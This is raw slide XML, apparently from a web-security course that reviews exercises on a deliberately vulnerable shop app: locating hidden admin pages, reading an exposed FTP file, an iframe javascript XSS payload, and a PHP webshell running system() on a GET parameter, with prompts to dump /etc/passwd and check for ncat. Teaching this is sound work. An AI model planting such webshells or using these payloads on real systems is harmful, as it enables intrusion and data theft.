              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1055" name="Google Shape;1055;p5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56" name="Google Shape;1056;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="2228850"/>
            <a:ext cx="9144000" cy="26775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lang="en"/>
              <a:t>How would you construct a URL to:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dump /etc/passwd?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Determine if ncat is installed?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>List all files in the current </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="80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0" name="Shape 1370"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1371" name="Google Shape;1371;p10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Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1372" name="Google Shape;1372;p10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Locate the Score Board</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373" name="Google Shape;1373;p10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74" name="Google Shape;1374;p102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="4571700" cy="3648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sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/#/score-board</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1375" name="Google Shape;1375;p102"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="827950" y="1801450"/>
            <a:ext cx="7263151" cy="2962800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>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9" name="Shape 1379"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1380" name="Google Shape;1380;p10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Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1381" name="Google Shape;1381;p10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Locate the Admin Section</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1382" name="Google Shape;1382;p10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6" name="Shape 1386"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1387" name="Google Shape;1387;p10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Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1388" name="Google Shape;1388;p10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Locate the Admin Section</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1389" name="Google Shape;1389;p10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90" name="Google Shape;1390;p104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="5102700" cy="3648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sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&lt;ipaddress&gt;/#/administration</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1391" name="Google Shape;1391;p104"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1892525"/>
            <a:ext cx="8839203" cy="2550952"/>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5" name="Shape 1395"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1396" name="Google Shape;1396;p10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Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1397" name="Google Shape;1397;p10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Confidential Document</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1398" name="Google Shape;1398;p10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2" name="Shape 1402"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1403" name="Google Shape;1403;p10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Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1404" name="Google Shape;1404;p10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Confidential Document</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1405" name="Google Shape;1405;p10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06" name="Google Shape;1406;p106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1183050"/>
            <a:ext cx="7575600" cy="3648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sz="1800"/>
              <a:t>BurpSuite shows there are several FTP documents you can  access. Navigate to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&lt;ipaddress&gt;/ftp/acquisitions.md.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1407" name="Google Shape;1407;p106"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="146450" y="1883125"/>
            <a:ext cx="8754556" cy="29628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1" name="Shape 1411"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1412" name="Google Shape;1412;p10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Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1413" name="Google Shape;1413;p10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Error Handling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1414" name="Google Shape;1414;p10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8" name="Shape 1418"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1419" name="Google Shape;1419;p10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Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1420" name="Google Shape;1420;p10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Error Handling </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1421" name="Google Shape;1421;p10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22" name="Google Shape;1422;p108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1183050"/>
            <a:ext cx="7575600" cy="23463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sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Navigating to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&lt;ipaddress&gt;/#/administration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
              </a:rPr>
              <a:t> without admin privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> raises the error</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highligh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6" name="Shape 1426"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1427" name="Google Shape;1427;p10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Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1428" name="Google Shape;1428;p10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XSS Tier 0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1429" name="Google Shape;1429;p10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3" name="Shape 1433"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1434" name="Google Shape;1434;p11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Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1435" name="Google Shape;1435;p11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XSS Tier 0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1436" name="Google Shape;1436;p11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37" name="Google Shape;1437;p110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1183050"/>
            <a:ext cx="9144000" cy="23463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800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Search for an item. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Click on the item, in the search bar, you will see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>search=apple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Replace your item with the code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&lt;iframe src="javascript:alert('xss')"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1438" name="Google Shape;1438;p110"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2802925"/>
            <a:ext cx="9144000" cy="190309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2" name="Shape 1442"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1443" name="Google Shape;1443;p11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Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1444" name="Google Shape;1444;p11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XSS Tier 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1445" name="Google Shape;1445;p11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0" name="Shape 1060"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1061" name="Google Shape;1061;p5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Webshell Warm-Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1062" name="Google Shape;1062;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="14106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Suppose the following PHP webshell lives at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://vulnerable.site/shell.php</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400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="24292E"/>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24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="005CC5"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="005CC5"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>($_GET[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="032F62"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>"command"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>]);</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="152400" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="145000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
